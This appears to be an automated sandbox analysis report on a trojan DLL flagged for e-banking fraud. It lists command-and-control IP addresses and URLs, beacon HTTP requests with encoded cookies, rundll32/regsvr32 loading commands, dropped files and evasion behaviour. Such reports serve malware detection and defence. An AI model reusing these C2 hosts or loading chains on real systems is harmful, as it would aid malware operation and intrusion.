                      Source: regsvr32.exe, 00000006.00000003.410793511.0000000002C64000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.410742618.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://120.50.40.183:80/
                      Source: regsvr32.exe, 00000006.00000003.410793511.0000000002C64000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://120.50.40.183:80/$v6/
                      Source: regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://120.50.40.183:80/YQXxdxwQWLyBEVjMOlg
                      Source: regsvr32.exe, 00000006.00000003.410793511.0000000002C64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://120.50.40.183:80/za
                      Source: regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://131.100.24.231/
                      Source: regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://131.100.24.231:80/MIMNtRZxLqGHZoTXVDtaMauEeLlGAjcyCUbpgyHmvtdbZTHIDbPoaw
                      Source: regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://131.100.24.231:80/MIMNtRZxLqGHZoTXVDtaMauEeLlGAjcyCUbpgyHmvtdbZTHIDbPoawrlp
                      Source: regsvr32.exe, 00000006.00000003.365060100.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.410742618.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508876930.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://149.56.128.192/
                      Source: regsvr32.exe, 00000006.00000003.365060100.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.410742618.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508876930.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://149.56.128.192/Q4
                      Source: regsvr32.exe, 00000006.00000003.410649801.0000000002BEC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.365020565.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508876930.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://149.56.128.192/SSYKvnZUOEUlRtjgPVsscjkUTaNTgTQQvJUHkyX
                      Source: regsvr32.exe, 00000006.00000003.410649801.0000000002BEC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.365020565.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508876930.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://149.56.128.192/SSYKvnZUOEUlRtjgPVsscjkUTaNTgTQQvJUHkyX-
                      Source: regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://159.8.59.82/
                      Source: regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://159.8.59.82:8080/AgctwBgxIsTEnzPyqHwVtfcFB
                      Source: regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.218.63/
                      Source: regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.218.63:8080/5
                      Source: regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.218.63:8080/E
                      Source: regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.218.63:8080/lksHycwarnaSRJQsEAZwtocdkTVZGajE
                      Source: regsvr32.exe, 00000006.00000003.365060100.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.410742618.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508876930.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.254.208.91/
                      Source: regsvr32.exe, 00000006.00000003.410649801.0000000002BEC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.365020565.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508876930.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.254.208.91:8080/iqyyOTGODIozOxlzJCOT
                      Source: regsvr32.exe, 00000006.00000003.410649801.0000000002BEC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.365020565.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508876930.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.254.208.91:8080/iqyyOTGODIozOxlzJCOa
                      Source: regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.157.82.211/
                      Source: regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.157.82.211:8080/
                      Source: regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.157.82.211:8080/cal
                      Source: regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.157.82.211:8080/r
                      Source: regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://192.99.251.50/
                      Source: regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://192.99.251.50/27.42.236/h
                      Source: regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://192.99.251.50/5563209-4053062332-1002
                      Source: regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://192.99.251.50/:
                      Source: regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://192.99.251.50/F
                      Source: regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://192.99.251.50/njigQUBviBvfjJoFmpOFCcuxzCMjisKOYgnAJJuZGrOYExdzIkjfPaaGvSwrlp
                      Source: regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://206.188.212.92/
                      Source: regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://206.188.212.92/7
                      Source: regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://206.188.212.92/X
                      Source: regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://206.188.212.92:8080/WvwiYegTHwVudezOCrWPjYKhpMeUQep
Source: unknown | DNS traffic detected: queries for: time.windows.com
Source: global traffic | HTTP traffic detected: GET /SSYKvnZUOEUlRtjgPVsscjkUTaNTgTQQvJUHkyX HTTP/1.1; Cookie: wd=CeWC3bvXPYw6ceEYgfvGdLYPTo0VXwyjQM1b37/spkNB3CGw86NzMzKf1AUGnAmmtW/OWNjKbUC9gyl1OQsrdyfP5xbn01or99X72cgyaEexWqMXtNXm3BOHAyBwYk6TnEAF0q3TMdibHcQhcNNo6Sm9GxBDPs+KnKkOdOQZ76tbXnfftFwj68x6LE4gFCEnmcMMTNEuYiAXbOCL+S+FsI+fnIMfAI5oXYW5JqiwY3vIUlQBUwfTw48YkmxLCfsNjgx6F20LQV3Hnux9vPTgtjjTh1sYYnbNkqrHAkwHKUzWJuie4H3uJ+0/v2jViJz29FfNeDiPeJZqmSc76S+b; Host: 149.56.128.192; Connection: Keep-Alive; Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /TBwKHjQjVeCWIQFS HTTP/1.1; Cookie: TzD=CeWC3bvXPYw6ceEYgfvGdLYPTo0VXwyjQM1b37/spkNB3CGw86NzMzKf1AUGnAmmtW/OWNjKbUC9gyl1OQsrdyfP5xbn01or99X72cgyaEexWqMXtNXm3BOHAyBwYk6TnEAF0q3TMdibHcQhcNNo6Sm9GxBDPs+KnKkOdOQZ76tbXnfftFwj68x6LE4gFCEnmcMMTNEuYiAXbOCL+S+FsI9Ih3e+pR2YRWgAeau9SKu/amPhx+vBX8EeVceLhJI1Cl5c/CGgAhr7yQ63yo30L73FGkUea/TvEpxNO3PjqOskzZcORWqX5SDpz1exfeePjzjvPRMWMpzyGCnmStacLsD4YfqerzQ/buYpgMei8ILwW16H6ENPPQ==; Host: 46.55.222.11; Connection: Keep-Alive; Cache-Control: no-cache
Source: unknown | HTTPS traffic detected: 149.56.128.192:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 46.55.222.11:443 -> 192.168.2.4:49863 version: TLS 1.2

                      E-Banking Fraud

Source: Yara match | File source: 2.2.regsvr32.exe.4df0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.4f10000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.regsvr32.exe.4590000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.3530000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.regsvr32.exe.9c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.rundll32.exe.2940000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.rundll32.exe.4230000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.3530000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.regsvr32.exe.4dc0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.regsvr32.exe.9c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.regsvr32.exe.4dc0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.rundll32.exe.2940000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.247001370.0000000004231000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.762864021.0000000004591000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.246952927.0000000002940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.246760873.0000000003530000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.761637752.00000000009C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.250264890.0000000004DF1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.250193606.0000000004DC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.246960941.0000000004F11000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: psIFSn7VLi.dll | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
Source: C:\Windows\SysWOW64\regsvr32.exe | File deleted: C:\Windows\SysWOW64\Arwhu\ttgk.pdy:Zone.Identifier
Source: C:\Windows\SysWOW64\regsvr32.exe | File created: C:\Windows\SysWOW64\Arwhu\
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_10041D70
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_10041D70
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: String function: 10040C7C appears 42 times
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 10040C7C appears 39 times
Source: psIFSn7VLi.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: sfc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: xboxlivetitleid.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cdpsgshims.dll
Source: psIFSn7VLi.dll | Virustotal: Detection: 63%
Source: psIFSn7VLi.dll | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\psIFSn7VLi.dll"
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\psIFSn7VLi.dll",#1
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\psIFSn7VLi.dll
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\psIFSn7VLi.dll",#1
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\psIFSn7VLi.dll,DllRegisterServer
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\psIFSn7VLi.dll,DllUnregisterServer
Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Arwhu\ttgk.pdy"
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown | Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\System32\svchost.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -s W32Time
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\psIFSn7VLi.dll",#1
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\psIFSn7VLi.dll
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\psIFSn7VLi.dll,DllRegisterServer
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\psIFSn7VLi.dll,DllUnregisterServer
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\psIFSn7VLi.dll",#1
Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Arwhu\ttgk.pdy"
Source: C:\Windows\System32\svchost.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Windows\SysWOW64\regsvr32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{D105A4D4-344C-48EB-9866-EE378D90658B}\InProcServer32
Source: C:\Windows\System32\svchost.exe | File created: C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl
Source: classification engine | Classification label: mal100.troj.evad.winDLL@29/8@2/57
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_1003D09A __EH_prolog,VariantClear,SysAllocStringByteLen,CoCreateInstance,CoCreateInstance,CoCreateInstance,
Source: C:\Windows\SysWOW64\regsvr32.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\psIFSn7VLi.dll",#1
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3388:120:WilError_01
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_1002EA60 FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,memcpy,malloc,??3@YAXPAX@Z,
Source: C:\Windows\SysWOW64\regsvr32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_1003E8D0 push eax; ret
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_1003E8D0 push eax; ret
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_1003F964 push eax; ret
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_10040CB7 push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_10040CB7 push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_1003E8D0 push eax; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1003E8D0 push eax; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1003F964 push eax; ret
                      Source: psIFSn7VLi.dllStatic PE information: section name: .didat
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10049401 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\psIFSn7VLi.dll
                      Source: C:\Windows\SysWOW64\regsvr32.exePE file moved: C:\Windows\SysWOW64\Arwhu\ttgk.pdyJump to behavior
                      Source: C:\Windows\System32\svchost.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W32Time\ConfigJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
Source: C:\Windows\SysWOW64\regsvr32.exe | File opened: C:\Windows\SysWOW64\Arwhu\ttgk.pdy:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Windows\SysWOW64\Pwywyaihuigj\xpxapuj.ypc:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Windows\SysWOW64\Hryrotqgbtbdfp\yklzymlfbv.qfq:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_10039047 IsIconic,GetWindowPlacement,GetWindowRect,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_10039047 IsIconic,GetWindowPlacement,GetWindowRect,
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe TID: 6284 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6280 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6856 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\regsvr32.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Windows\SysWOW64\rundll32.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
Source: C:\Windows\SysWOW64\regsvr32.exe | API coverage: 6.4 %
Source: C:\Windows\SysWOW64\rundll32.exe | API coverage: 6.3 %
Source: C:\Windows\SysWOW64\regsvr32.exe | Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_1003E90D VirtualQuery,GetSystemInfo,VirtualQuery,VirtualAlloc,VirtualProtect,
Source: C:\Windows\SysWOW64\regsvr32.exe | API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\rundll32.exe | API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\regsvr32.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe | File Volume queried: C:\ FullSizeInformation
Source: svchost.exe, 00000014.00000002.664670317.000001697E829000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW@`
